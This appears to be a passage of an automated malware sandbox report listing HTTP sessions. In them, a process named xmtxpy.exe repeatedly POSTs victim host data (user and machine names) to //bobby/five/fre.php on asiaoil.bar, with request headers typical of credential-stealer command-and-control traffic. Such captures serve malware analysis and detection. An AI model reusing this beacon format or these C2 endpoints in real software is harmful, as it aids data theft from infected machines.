                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lb9okY1H6vGjyVC1u7%2FrtI1IlQS%2BFDAUyP1p%2FRqqpdW3oHWuKdkbXEj1FlsGoYPfJTBdMWMce2JdGAcisXgmjvWPRjePl3xI2oQ%2BLjS4JVazUAB%2FtUVsenR8M%2BuUug%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44555fbc890ee-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        30 | 192.168.2.22 | 49195 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:35.055712938 CET | 364 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:35.072159052 CET | 364 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:35.142774105 CET | 365 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:35 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uRm6cbs7qjH2NOHh2tOKIkP%2BdzbOwZXOMBEJgE3gb2LRZ5T9DoyDbWgSAgyAW9SjYweFy2OcxyEn%2BT93qxg4gzWWmZP%2Bi0t5VxRBmaJZLw%2FLRVoZMESNjhIGteoHMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4461928579004-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        31 | 192.168.2.22 | 49196 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:36.072597980 CET | 366 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:36.088974953 CET | 366 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:36.184967995 CET | 367 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:36 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xrOr1KSQmX9JZILB3weUMlW6l%2F0jQY3ebDX3HclhX28Mcc%2FxH30ewiGA0h%2B6cIBx8JHVt3F2yuoloaiZkYlnrBJGiKNxRH6q72FSDnO4vOtUB%2F3%2FUP0EEMJM1AusYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4461f7a6a9079-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        32 | 192.168.2.22 | 49197 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:37.120242119 CET | 367 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:37.137352943 CET | 368 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:37.238821030 CET | 368 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:37 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RG%2BfeuYDl%2BqDfIJiQqO%2F%2BvdeX%2FsqQOMNdYojKtTw1E0TmD5kZfpZ7nDimmccAbecgCEw4KhPek%2BrNtGEwSzq0DOsMtNFWpBsI22TENldaFbPIU5b5CTiuxOP6VQaaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446260fb19019-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        33 | 192.168.2.22 | 49198 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:38.172976971 CET | 369 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:38.189532995 CET | 369 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:38.275609016 CET | 370 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:38 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8i3MYQHtfXVP%2F0fASkC1TmdLbF6CiAiraD%2FH44NC0ykl97qHV9jn8MkbKPqY5BdlYRn49S%2F8lYCjj%2FQu3cIXkHTHLxiFgznNR4%2Bp6Kgrrg52L092%2FlGqFymsCMGR0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4462c9e3791fc-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        34 | 192.168.2.22 | 49199 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:39.224649906 CET | 371 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:39.242547989 CET | 371 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:39.314145088 CET | 372 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:39 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8IzBsU9ezcfTcYipeA3VQtk7w40pxZ5hjlcKQvqw49ojoP1nGh40I6q6Dyh76z4LCC%2BA20%2Fsg0VifVwdOdSi33A6OvrYN65%2FpXFFW%2FSM0mozc%2B4piSK803pIJT8SEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446333d2791ff-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        35 | 192.168.2.22 | 49200 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:40.420564890 CET | 373 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:40.437928915 CET | 373 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:40.521979094 CET | 374 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:40 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9t3R%2F4b%2BnD1kTHMJA2ZVHrmeMMJ3Bd02VhJ1WPbcEvJly%2BkAhl4QMrCDxePymIvRWvfDOjaPHdcP0k0kjEFpUPsz22Xy7Rg%2F6wzikwLkWIzwoyWJkUL5tvQWI96tAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4463aab43920b-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        36 | 192.168.2.22 | 49201 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:41.439397097 CET | 375 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:41.455754042 CET | 375 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:41.572663069 CET | 375 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U73XLOsc6Oe9yZY%2B47E4Oe8aR4QjbykbQwVxWcy4AoCZmzTRfSc4KodkgvxCsNphdTrX0C20cDMAGUY1y%2Fzw8iNzNLGyI2dqsO%2B6Mc%2FCxzGZVmVZz0bSOwNj1s7QeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446410864918f-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        37 | 192.168.2.22 | 49202 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:42.533999920 CET | 376 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:42.550273895 CET | 377 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:42.618619919 CET | 377 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:42 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gufXVp6viiLfqUVAIhTCHjYJOWCjHt2MTTOHWp5%2BFhyL3M%2BbMbx%2BVMYETZElkIaZ%2FIvrsDt5jDpyZjmMZ9o2O%2FwcV9pRsZqOTc1AF0p2Ib213bW35V6pz00NvcCpPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44647eb7b693a-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        38 | 192.168.2.22 | 49203 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:43.544899940 CET | 378 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:43.561275959 CET | 378 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:43.664395094 CET | 379 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:43 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yKL07jfvs%2BVU4LY4v4Lf0ZGlr%2FIQtMwEPs3bXhHAZspcC%2BNoewD0Rp%2Bye%2FUTm0R72TSKjFoKvNaY7JUUOQLFHqLgLo%2BRTvtpResbSpFvDqoGUIkATecZSSRbWV5rqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4464e3d16912a-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        39 | 192.168.2.22 | 49204 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:44.584137917 CET | 380 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:44.600441933 CET | 380 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:44.682432890 CET | 381 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:44 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YEpekNteQXIJDJauaElbNeLCz0rJIFKhZ7g570xBDVwmYpo12zP6dtthdwoFyYhQ53RMVLKxNG0u7RjPVwRtZkMkV1Qw90wv9Z0CU6vQQlTHweFh1xgcsARiAUxjiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44654bfd79199-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        4 | 192.168.2.22 | 49169 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:04.920207977 CET | 318 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:04.937419891 CET | 318 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:05.027216911 CET | 318 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:05 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WGSy9RBpA4nwv8vPkiC6IlReHDy2beH0Xpr8Jw91%2BmfmRccN%2FYfWCgt%2Fb96BC2i38aPjRgJdSwh7RJOrlqreqeiX8LTLhluVlMMPLsLX%2BVqck485IQfR0ZCBs3Abjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4455ccab45c80-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        40 | 192.168.2.22 | 49205 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:45.641460896 CET | 382 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:45.657860994 CET | 382 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:45.752800941 CET | 383 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vgBF41clmh4ryuHtU9aOlwd5HEGXjVWqgWBKt0N2O3lBaHqKVGyePCSnXUW7Z%2B9ZswG3zzpAggxRL3OI9PhK3b7diqp15dvDHTlhkQ9V7NyyEid0hjMzsNR7GBdvGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4465b4f709186-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        41 | 192.168.2.22 | 49206 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:46.729665995 CET | 383 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:46.746081114 CET | 384 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:46.816407919 CET | 384 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:46 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qIeTn8QUGJ4PzoL3khYwIjL17%2BBJiTqpZBu%2Bn6l1sSUiSmu%2FH0zc5lyfpLKOHy9tsuu9Y%2F%2BH47s3hpg5DfFC4zroN87eErlds3zDKfV6u79W6o1WqB%2F6UGbnxHqWFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446621d638fc5-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        42 | 192.168.2.22 | 49207 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:47.737185955 CET | 385 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:47.753462076 CET | 386 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:47.842878103 CET | 386 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:47 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6LETH6p%2BXICZC%2BrIHSRQApAEV%2Bdr0iLIW7rBeA%2Fr7Hi4%2Fpf1OlVs9AUjZdSrzw3XtXmW7vu3g0lnMlRgI0IK52z10KSNGVwmWG%2FAp9wtB9EgWL0CS5tO1Mwb6FiG8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446686e9b6945-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        43 | 192.168.2.22 | 49208 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
